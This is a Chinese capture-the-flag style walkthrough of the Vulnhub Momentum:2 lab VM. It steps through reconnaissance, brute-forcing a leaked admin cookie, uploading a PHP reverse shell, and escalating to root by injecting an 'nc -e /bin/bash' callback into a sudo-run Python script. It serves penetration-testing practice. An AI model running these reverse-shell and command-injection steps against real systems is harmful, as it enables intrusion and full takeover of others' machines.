看完这篇 教你玩转渗透测试靶机Vulnhub——Momentum:2

简介: 看完这篇 教你玩转渗透测试靶机Vulnhub——Momentum:2

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。



PS:这个是Momentum系列一共有2个靶机,分别是1.2老样子需要获得root权限找到flag

Difficulty:medium



Vulnhub靶机下载:

官网下载:https://download.vulnhub.com/momentum/Momentum2.ova

Vulnhub靶机安装:

下载好了把安装包解压 然后使用Oracle VM打开即可。


Vulnhub靶机漏洞详解:

①:信息收集:


kali里使用arp-scan -l或者netdiscover发现主机

渗透机:kali IP :192.168.0.113 靶机IP :192.168.0.112


使用命令:nmap -sS -sV -A -n -p- 192.168.0.112



发现开启了8022端口 先访问一下80端口老样子dirsearch、dirb扫描一下后台



这里在使用gobuster 发现/owls/目录访问发现是上传文件的绝对路径

gobuster dir -u http://192.168.0.112/ -x html,php,bak,txt --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  




044fa5e8e76a486c81980a20a8c80c0b.png

②:漏洞发现:

扫描出来发现了一个/js/源码 和dashboard.html上传点



这边先随便测试一下发现可以上传txt 但是不能传php被过滤了
这里可以通过抓包修改 返回结果为1说明上传成功


这里发现还有备份文件ajax.php.bak下载查看

   //The boss told me to add one more Upper Case letter at the end of the cookie
   if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){
       //[+] Add if $_POST['secure'] == 'val1d'
        $valid_ext = array("pdf","php","txt");
   }
   else{
        $valid_ext = array("txt");
   }
   // Remember success upload returns 1 


大概的意思就是cookie最后以为需要爆破 ,然后需要添加cookie字段 名称为admin

且添加POST 数据 secure =valid 都满足 就能上传 pdf php txt 文件


③:文件上传漏洞利用:

首先打开bp抓包上传php-reverse-shell(改为kali监听ip)填写cookie值 和post数据值

然后发送到Intruder(爆破模块-狙击手模式)可以手动添加26个英文单词大写字母也可以使用kali字典crunch生成字典 当回显返回为1时就是爆破结果。很显然 这里是R

crunch 1 1 -t , >> pass.txt  #生成26个大写字母
cookie: admin=&G6u@B6uDXMq&Ms
Content-Disposition: form-data; name="secure"; #复制粘贴到bp里面
val1d


e45bba6742fb434a9c5f2d38095725af.png

02ecdf55f0754ab982c5f5ee31f7ddd8.png



4754240bd7f24c9c951d4dae8849e3dd.png


④:反弹Shell:

然后我们再去上传成功的目录进行查看有个新的 直接 nc-lvvp 1234 监听 双击运行 回弹shell


老样子python交互 python3 -c 'import pty; pty.spawn("/bin/bash")'

然后查看权限 id whoami/home/athena 下发现了第一个flag



⑤:SSH登入:

然后查看密码文件Asterisk(✳得意思)通过分析可以得到账号密码为:athena/myvulnerableapp*



⑥:sudo python3提权:

sudo -l 查看有个root权限可以执行得python文件进行查看


来简单分析一下啥意思:定义了一个seed 然后需要输入 脚本为了回显输出,会去执行 bash 命令
我们将反弹root权限的shell命令存入seed变量执行 就可以提权为root

sudo -u root /usr/bin/python3 /home/team-tasks/cookie-gen.py #执行python文件
nc -lvvp 6666 #本地监听
;nc -e /bin/bash 192.168.0.113 6666; #输入回弹命令


64a8f12b951542ffb1afecd628514772.png


⑦:获取FLAG:

至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!



Vulnhub靶机渗透总结:


1.信息收集arp-scan -l 获取ip地址 和端口信息 web扫描工具:nikto,dirsearch,dirb,dirbuster,whatweb,等 查看F12源码信息

2.BurpSuite爆破cookie 以及字典crunch得生成

3.sudo -l pyton3提权


Momentum系列得第2个靶机又完结啦,学习到了很多知识点又是收获满满的一天(耶耶耶!)

最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

相关文章
|
安全 Linux 网络安全
Neos的渗透测试靶机练习——DC-3
Neos的渗透测试靶机练习——DC-3
262 4
|
安全 Shell 网络安全
Neos的渗透测试靶机练习——DC-1
Neos的渗透测试靶机练习——DC-1
371 4
|
Devops Shell 网络安全
Neos的渗透测试靶机练习——Wakanda
Neos的渗透测试靶机练习——Wakanda
243 2
|
安全 中间件 Shell
渗透测试-靶机DC-2-知识点总结
渗透测试-靶机DC-2-知识点总结
599 0
|
安全 网络协议 Shell
渗透测试-靶机DC-1-知识点总结
渗透测试-靶机DC-1-知识点总结
380 0
|
11月前
|
Java 测试技术 容器
Jmeter工具使用:HTTP接口性能测试实战
希望这篇文章能够帮助你初步理解如何使用JMeter进行HTTP接口性能测试,有兴趣的话,你可以研究更多关于JMeter的内容。记住,只有理解并掌握了这些工具,你才能充分利用它们发挥其应有的价值。+
1538 23
|
SQL 安全 测试技术
2025接口测试全攻略:高并发、安全防护与六大工具实战指南
本文探讨高并发稳定性验证、安全防护实战及六大工具(Postman、RunnerGo、Apipost、JMeter、SoapUI、Fiddler)选型指南,助力构建未来接口测试体系。接口测试旨在验证数据传输、参数合法性、错误处理能力及性能安全性,其重要性体现在早期发现问题、保障系统稳定和支撑持续集成。常用方法包括功能、性能、安全性及兼容性测试,典型场景涵盖前后端分离开发、第三方服务集成与数据一致性检查。选择合适的工具需综合考虑需求与团队协作等因素。
2041 24
|
SQL 测试技术
除了postman还有什么接口测试工具
最好还是使用国内的接口测试软件,其实国内替换postman的软件有很多,这里我推荐使用yunedit-post这款接口测试工具来代替postman,因为它除了接口测试功能外,在动态参数的支持、后置处理执行sql语句等支持方面做得比较好。而且还有接口分享功能,可以生成接口文档给团队在线浏览。
656 2
|
监控 API 开发工具
Socket.IO介绍,以及怎么连接测试Socket.IO接口?
Socket.IO 是一个用于浏览器和服务器间实时双向通信的库,支持低延迟消息传递、跨平台运行及自动重连。文章介绍了其特点与调试需求,并详细说明如何使用 Apifox 工具创建、连接、发送/接收 Socket.IO 事件,以及团队协作和调试技巧。掌握这些技能可提升实时应用开发效率与质量。
|
存储 JSON API
Python测试淘宝店铺所有商品接口的详细指南
本文详细介绍如何使用Python测试淘宝店铺商品接口,涵盖环境搭建、API接入、签名生成、请求发送、数据解析与存储、异常处理等步骤。通过具体代码示例,帮助开发者轻松获取和分析淘宝店铺商品数据,适用于电商运营、市场分析等场景。遵守法规、注意调用频率限制及数据安全,确保应用的稳定性和合法性。

热门文章

最新文章